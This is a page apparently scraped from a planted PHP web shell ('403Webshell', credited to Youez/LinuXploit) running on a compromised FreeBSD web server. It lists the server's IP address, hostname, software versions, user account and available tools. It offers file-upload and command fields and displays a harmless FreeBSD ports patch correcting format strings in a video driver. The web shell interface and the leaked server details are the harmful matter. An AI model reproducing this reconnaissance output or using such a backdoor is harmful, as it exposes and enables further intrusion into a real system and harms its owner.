403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/x11-drivers/xf86-video-savage/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/x11-drivers/xf86-video-savage/files/patch-src_savage__video.c
# Correct type in a couple format strings
#
--- src/savage_video.c.orig	2017-01-17 22:43:40 UTC
+++ src/savage_video.c
@@ -303,10 +303,10 @@ unsigned int GetBlendForFourCC2000( int 
 
 void savageOUTREG( SavagePtr psav, unsigned long offset, unsigned long value )
 {
-    ErrorF( "MMIO %08lx, was %08lx, want %08lx,", 
+    ErrorF( "MMIO %08lx, was %08x, want %08lx,", 
 	offset, (CARD32)MMIO_IN32( psav->MapBase, offset ), value );
     MMIO_OUT32( psav->MapBase, offset, value );
-    ErrorF( " now %08lx\n", (CARD32)MMIO_IN32( psav->MapBase, offset ) );
+    ErrorF( " now %08x\n", (CARD32)MMIO_IN32( psav->MapBase, offset ) );
 }
 
 #if 0

Youez - 2016 - github.com/yon3zu
LinuXploit